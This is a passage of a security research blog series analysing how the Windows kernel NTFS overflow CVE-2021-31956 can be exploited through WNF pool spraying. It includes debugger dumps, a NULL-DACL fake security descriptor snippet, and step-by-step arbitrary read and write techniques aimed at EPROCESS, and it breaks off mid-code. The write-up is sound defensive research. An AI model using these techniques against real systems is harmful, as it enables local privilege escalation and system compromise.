 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagrammatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back from this minor pipe attribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate whether it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would pass.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA, which will lead to a _WNF_NAME_INSTANCE being allocated for each _WNF_STATE_DATA created.

Therefore we can end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and that this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the corrupted internal StateName needs to correspond to the external name being queried.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

The external version of the StateName is the internal version of the StateName XOR'd with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst the Version, LifeTime and DataScope fields are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope either the current Silo Globals or the Server Silo Globals structure is offset into to obtain v10, and this is then used as the Sequence, which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as the StateName sits just past the TreeLinks _RTL_BALANCED_NODE which is rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don't necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers; however, the main caveat is that care needs to be taken to avoid triggering safe unlinking protection.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake security descriptor with the same values. This didn't work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790, STATUS_ACCESS_DENIED).

Ok then! Let's just make the DACL NULL, so that the Everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c; // SE_SELF_RELATIVE | SE_DACL_DEFAULTED | SE_DACL_PRESENT
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;   // NULL DACL: the Everyone group gets full access

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that setting the StateData pointer to 0x6161616161616161 would cause a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, it is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function is a significantly hot path, and conditional breakpoints led to a huge system standstill.

Anyhow, typically after achieving an arbitrary write an attacker will leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following conditions needed to be met:

1) The overwritten internal StateName must match up with a known external StateName so the name instance can be looked up when required.
2) The Security Descriptor must pass the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocatedSize must be appropriate for the area of memory targeted.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS is treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target the KTHREAD structure's PreviousMode member

2) Target the EPROCESS Token

These approaches and their pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary, we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog post I will cover reliability improvements, kernel memory clean-up and the continuation of this exploit.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within a blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution, the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process's security context and contains things such as the token privileges, token type, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to read and write a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess pointer to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty with this is that low fragmentation heap (LFH) randomisation makes reliably achieving this memory layout more difficult, and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "Heap Randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what clean-up needs to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which, when added to the header (0x10) and the POOL_HEADER (0x10), also ends up in a chunk of 0xC0).

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, since we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of freeing holes as in the past article and then reusing them, because both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don't know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATE_DATA-containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData, an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1) remediated and 2) and 3) occurring only very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above (and within the first blog post), we can use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE, and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData and ScopeInstance members can be disclosed from the identified target object.
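The scan can be sketched as follows. This is a minimal user-mode model rather than the exploit itself: it assumes the relative read has already copied the adjacent pool memory into a local buffer, and the member offsets used are those of the build tested (verify them with `dt nt!_WNF_NAME_INSTANCE` against your target).

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* _WNF_NAME_INSTANCE member offsets on the build tested (Windows 10
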